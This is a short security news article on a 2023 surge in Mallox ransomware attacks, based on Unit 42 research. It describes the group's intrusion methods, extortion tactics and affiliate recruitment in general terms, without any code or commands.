The year 2023 has seen a shocking 174% spike in the activities of Mallox ransomware, according to new findings from Unit 42 at Palo Alto Networks.
“Like its counterparts, Mallox ransomware adopts the dual extortion strategy: it steals data prior to encrypting an organization’s files, then threatens to expose the pilfered data on a leak site. This tactic applies pressure on victims, coercing them to pay the demanded ransom,” shared security researchers Lior Rochberger and Shimi Cohen in a fresh report released to The Hacker News.
The threat actor behind Mallox has ties with other ransomware strains including TargetCompany, Tohnichi, Fargo, and the most recent, Xollam. The Mallox first made its presence known in June 2021.
Industries notably targeted by Mallox include manufacturing, professional and legal services, and the wholesale and retail sectors.
A characteristic feature of this group is its exploitation of inadequately protected MS-SQL servers through dictionary attacks, using this as a method of infiltrating victims’ networks. Interestingly, Xollam deviates from this standard procedure, instead opting to use malicious OneNote file attachments for initial access, as highlighted by Trend Micro in the previous month.
On successfully infiltrating a host, Mallox executes a PowerShell command to pull the ransomware payload from a distant server. The binary then undertakes a series of actions: halting and removing SQL-related services, erasing volume shadow copies, clearing system event logs, terminating security-related processes, and bypassing Raccine, an open-source utility created to thwart ransomware attacks. Following these steps, it initiates the encryption process, leaving a ransom note in each directory.
TargetCompany, despite being a small, exclusive group, has been seen to be recruiting for the Mallox ransomware-as-a-service (RaaS) affiliate program on the RAMP cybercrime forum.
Ransomware continues to be a profitable venture, generating an alarming $449.1 million for cybercriminals in the first half of 2023 alone, as reported by Chainalysis.
The abrupt rise in Mallox attacks is a reflection of a wider trend, where ransomware incidents have seen a 221% rise year-on-year as of June 2023. A significant 434 attacks were reported in June 2023 alone, largely attributed to Cl0p’s exploitation of the vulnerability in the MOVEit file transfer software.
“The Mallox ransomware group has ramped up their activities in recent months, and their current recruitment drive may potentially expand their range of targets if it proves successful,” stated the researchers.